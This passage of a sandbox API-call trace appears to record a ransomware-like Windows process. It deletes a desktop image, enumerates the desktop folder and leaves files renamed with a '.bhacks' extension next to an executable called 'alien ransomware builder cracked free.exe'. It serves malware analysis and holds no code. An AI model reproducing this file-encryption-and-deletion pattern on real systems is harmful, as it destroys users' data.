lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif", lpFilePart=0x0) returned 0x28 [0064.473] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mCQMPnOOyUYP.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\mcqmpnooyuyp.gif")) returned 1 [0064.476] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0064.476] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2404fa44, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2404fa44, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0064.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0064.476] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0064.476] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.476] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.jpg", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84cebd0, ftCreationTime.dwHighDateTime=0x1d5d2da, ftLastAccessTime.dwLowDateTime=0xc11d8380, ftLastAccessTime.dwHighDateTime=0x1d5d10b, ftLastWriteTime.dwLowDateTime=0xc11d8380, ftLastWriteTime.dwHighDateTime=0x1d5d10b, nFileSizeHigh=0x0, nFileSizeLow=0x3443, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg", cAlternateFileName="W3NCKP~1.JPG")) returned 0x9bf140 [0064.476] FindClose (in: hFindFile=0x9bf140 | out: hFindFile=0x9bf140) returned 1 [0064.476] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2404fa44, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2404fa44, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be6c0 [0064.477] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2404fa44, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2404fa44, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.477] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0064.477] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0064.477] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0064.477] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0064.478] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0064.478] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0064.478] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0064.478] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0064.478] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0064.478] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0064.478] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0064.479] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0064.479] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0064.479] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0064.479] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0064.479] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0064.479] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0064.480] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0064.480] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0064.480] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0064.480] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0064.480] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0064.480] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0064.480] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0064.481] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0064.481] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0064.481] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0064.481] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0064.481] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0064.481] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0064.482] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84cebd0, ftCreationTime.dwHighDateTime=0x1d5d2da, ftLastAccessTime.dwLowDateTime=0xc11d8380, ftLastAccessTime.dwHighDateTime=0x1d5d10b, ftLastWriteTime.dwLowDateTime=0xc11d8380, ftLastWriteTime.dwHighDateTime=0x1d5d10b, nFileSizeHigh=0x0, nFileSizeLow=0x3443, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg", cAlternateFileName="W3NCKP~1.JPG")) returned 1 [0064.482] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0064.482] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0064.482] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0064.482] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0064.482] FindClose (in: hFindFile=0x9be6c0 | out: hFindFile=0x9be6c0) returned 1 [0064.482] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.jpg", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84cebd0, ftCreationTime.dwHighDateTime=0x1d5d2da, ftLastAccessTime.dwLowDateTime=0xc11d8380, ftLastAccessTime.dwHighDateTime=0x1d5d10b, ftLastWriteTime.dwLowDateTime=0xc11d8380, ftLastWriteTime.dwHighDateTime=0x1d5d10b, nFileSizeHigh=0x0, nFileSizeLow=0x3443, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg", cAlternateFileName="W3NCKP~1.JPG")) returned 0x9bf2c0 [0064.483] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0064.483] FindClose (in: hFindFile=0x9bf2c0 | out: hFindFile=0x9bf2c0) returned 1 [0064.483] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, 